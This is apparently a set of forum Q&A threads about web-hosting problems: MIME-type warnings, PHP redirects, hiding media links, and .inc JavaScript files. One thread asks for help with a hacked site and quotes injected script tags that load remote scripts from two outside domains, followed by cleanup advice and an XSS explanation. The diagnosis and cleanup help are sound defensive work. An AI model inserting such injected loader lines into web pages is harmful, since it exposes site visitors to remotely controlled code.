Having uploaded my JavaScript, PHP and other relevant files to the web hosting server and tried to run them on browser I had the following error:
Resource interpreted as Script but transferred with MIME type text/html: "http://stats.hosting24.com/count.php".
It seems that the html and php files works fine but I assume there is a problem with the js files. I would immensely appreciate if anyone could explain what the actual problem is and how it can be resolved.
Best..
You seem to be using 000webhost, which I know, from experience, inserts a bit of HTML at the end of your HTML that triggers that specific warning in Google Chrome. You'll find this at the end of your page source:
<!-- Hosting24 Analytics Code -->
<script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>
<!-- End Of Analytics Code -->
The page at the URL has an empty response body, which suggests that it is simply a script that records analytics data. No actual JavaScript is returned.
How to Fix the Problem
I was able to fix the problem by disabling that extra bit of HTML. Go to http://members.000webhost.com/analytics.php and fill the form out. The password is the same as the one that you use to connect to your server via FTP. Under "Manage analytics code," choose "Disable Code." Click Submit, and the warning message should go away the next time that you refresh your webpage.
If you don't know the FTP password for your domain, you can change it by logging into your account, clicking "Go to CPanel" under the domain in question, and clicking "Change Account Password" under Main Menu.
Mime type means the type of file that you want your end data to produce. Here is a list of mime types:
http://en.m.wikipedia.org/wiki/Internet_media_type#section_1
The server was saying: "do you want me to process a script? Or do you want me to display this code as html."
It is receiving a script and you want it to display an html. So, the server was confused.
You need to specify the content type in your PHP:
header("Content-type: application/javascript");
In the case of this particular error, the PHP code (I assume) is actually spitting out JavaScript code. By default, Apache will send the contents of any PHP file as HTML, so the web browser receives the script but thinks it should be HTML. The browser is smart enough to "get over" the problem and interpret the script, but if you want to stop the error, make PHP let Apache know that it is returning JavaScript with this:
header("Content-type: text/javascript");
You could use
AddType text/javascript .js
in yout .htaccess / httpd.conf
Related
I have recently moved from localhost to my live website. I have a simple PHP login page. After the users details are checked with my mysql table and if the username exist and they provide a valid password for that username they are redirected to the home page. I was using the header function built in to PHP but this seems to be no longer working now that I am on my live website.
After further research it seems that I cannot use header tags after the page loads. So I am not echo'ing out script tags to window.location redirect to my homepage. The problem with this is that when the new location is being redirected to it appears to look like an additional web pages is loading in before my actual webpage that I'm wanting to go to loads in (This is probably due to the fact that I have extra error handling code that is running after the fact). Does anyone else experience this when using this method? Is there a better way to handle this?
This is what I'm using currently just in case there is any confusion
echo '<script>window.location.href = "home.php";</script>';
I was using the header function built in to PHP but this seems to be
no longer working now that I am on my live website.
Headers must be the very first thing that your script outputs or they won't work. PHP has a convenience feature called output buffering which temporarily holds back the output until the script is done. This allows you to put calls to header() anywhere in your code, and then PHP will automatically take care of moving headers to the front of the output for you. Thus, if you have output buffering enabled, you can put headers anywhere and it will still work. If you do not have output buffering enabled, you must put headers at the very start.
I will wager that you are generating output before the headers, and your local PHP install has output buffering enabled, while your remote host does not. You can fix this in one of two ways:
Update your code to ensure that nothing is output before calls to header().
Enable output buffering on your host by setting output_buffering = 1 in your php.ini.
I recently learnt you can do this with a meta tag:
<meta http-equiv="refresh" content="2;url=http://example.com/" />
My website all the html and js files are affected by some scripts.
The below script inside all the html files.
<!--937592--><script type="text/javascript" src="http://jamesdeocariza.com/cnt.php?id=5653691"></script><!--/937592-->
and the below script inside all the js files.
/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/
I don't know how this code inside all the html and js files. This <!--937592--> number and the src="http://jamesdeocariza.com/cnt.php?id=5653691" src url is not static. it's dynamic number and url.
Is this Cross Side Script (XSS) Attack?
If you are not the owner of the server jamesdeocariza.com and brilleandmore.de then it looked like your server was hacked and someone injected the above code into all of your HTML and JavaScript files.
To explain XSS attacks: Imagine you have a bad written PHP file which contains code like:
<p>Your username <?php echo $_GET["user"] ?></p>
Now someone can write a malicious formed link to your site like http://example.com/index.php?user=<script>//bad things</script>. If someone clicks on such a link the server would serve an HTML document with
<p>Your username <script>//bad things</script></p>
(In reallity the link will be encoded using the URL encoding with %XY)
In your case it seems worse than just a XSS attack, because it seems that the attacker somehow could change the source code of your site. This may happen in many ways like hacking your PC or your server (maybe you have an virus on your PC). Getting access to your source repository (for example brute forcing the password of your github account) or you had a man in the middle while a unencrypted FTP upload...
Your files are somehow compromised and the next steps you need are:
Remove the above 2 code snippets from your js and HTML files(all) immediately.
Check whether your site has been blacklisted by Google using tools like Sucuri and findout which other files are affected and remove the unwanted code from those pages
If Google already blacklisted your website, you will have to request a review AFTER cleaning all the infected files
Search for unwanted dynamic codes which are probably there as a result of this compromising and remove those files.
Find out how the attack may have occurred and fix it(website access logs will come in handy here)
I want to hide file links generated by php function in source code. I know its impossible to hide source code but i think there should be a way to hide php generated links in php code.
Here is the part of my code which used to generate links.
<?php foreach($tracks as $track){ ?>
<tr class="track"
data-track_order="<?php echo $track['menu_order']; ?>
"data-track_src=" <?php echo $track['audio_file']; ?>">
OUTPUT IN SOURCE
<tr class="track" data-track_order="2" data-track_src="http://domain.com/spins.mp3">
Is there any way in javascipt or in php vulnerability to make this hidden in source?
Well, From the above code, i tried so many encryptions methods but none of them worked.
I need any solution to make it hidden in source.
There are ways to try to get around this topic BUT the browser NEEDS to see the plain html code in order to render the webpage. Because of this current methods can be easily circumnavigated and they client will still be able to get hold of the link. So you can never fully stop the client getting your links BUT you can make it harder for them to get at it by using some techniques like javascript Obfuscation.
I presume that you want to hide the location so that people can't just retrieve the file without going through your site?
Instead of serving the file directly, have a php file serve the file. This file can then check that you are logged into the system, or have a time limited auth key that was generated from the page, whatever you think may limit the ability to copy and paste the link.
If the client accessing the file doesn't pass the checks, you serve them an authorisation failure header instead of the file contents.
What is the purpose of hiding the link? To stop people from being able to see the file location, or to stop anything other than your application from accessing the MP3's?
You can program the link into your JavaScript and obfuscate it which will make it hard for the end user to see the link but ultimately its impossible to complete hide it if you are sending the end user to that page.
If you want to simply stop people from accessing the MP3 location(s) you might be better off looking at putting a .htaccess / mod rewite on the directory that they are residing in, or, have a single .php page to load in the MP3's that will authenticate the referrer and/or server IP address before loading the required file.
New to ASP and probably never named a Javascript file ".inc" :-)
But that seems to be the norm where I'm currently working.
I observed that right on the first page I started getting these javascript errors
Message: 'globalVariableXXX' is undefined
I found that the javascript file wasn't getting called at all.
Just changed the name to ".js" and it worked !!
The ASP file includes the JavaScript file like this :
<SCRIPT LANGUAGE="Javascript" SRC="include/MenuCode.inc"></SCRIPT>
But there are 100's of these ".inc" files and 100's of references to them, hence don't want to go with this solution.
I'd rather understand it..
Any idea why it would've worked in the first place and why it isn't now ?
I'm sure I'm missing something pretty basic in ASP..
Another point : This application is installed on another server and it works just fine there when I hit it. I'm trying to install it on this new box.
Where I made the change for it to work:
In IIS, Right click on the name of the machine and the Mime Types are right over there. Checked the old server and it had the settings for ".inc", copied them and it started working :) Thanks all.
Maybe someone changed the webserver to prevent it serving .inc files ?
In the management console (inetmgr) right click the website and choose Properties. Go to "home directory" tab and click Configuration.
You will probably see the .inc extension there (in the mapping tab) meaning those files are parsed by the ASP engine.
Remove the item from the mappings table, apply and you should be able to parse those files as raw data.
The proper way to use a script tag for javascript is with the type attribute, such as
<script type="text/javascript" src="include/MenuCode.inc"></script>
see: http://www.w3schools.com/tags/tag_script.asp
language isn't even listed as a supported attribute by the standard..
Edit: The reason .js worked and .inc didn't is .js is in the mime type definitions of the server as a JAVASCRIPT mime type by default. If not using an extension configured as text/javascript by default, you have to tell the browser what to treat the file as somehow. This is why the text attribute of script is a required attribute as per html 4.01.
I'm developing a Web Server for android and I've some problems with external javascript files (.js).
With an external css it works fine, because it receives the TCP of the css file and then the server send it as a normal file.
with javascript files it doesn't receive any GET/POST request.
Can I include any tag to tell the browser to get a js file?
at this moment I only tried this one: <script type="text/javascript" src="js/javascript.js"></script>
EDIT:
I just added "text/javascript" content-type but nothing seems to has changed. If I open directly http://ip/js/javascript.js I get the text of javascript.js. Then, if I came back on my index.html, all javascript functions work... why?
EDIT 2:
My server (at this moment) doesn't use threads.. for each request it send the page and restarts the connection. this may be the problem??
but, in this case it should works "something"... no?
EDIT 3:
I had a confirm that may be a thread problem:
if in html file I reverse the javascript and the CSS tag, javascript works, css doesn't work. What do you think?
Make sure you aren't caching the file on the client side. If you have the js file linked in the page it will always attempt to download it, with the exception of caching.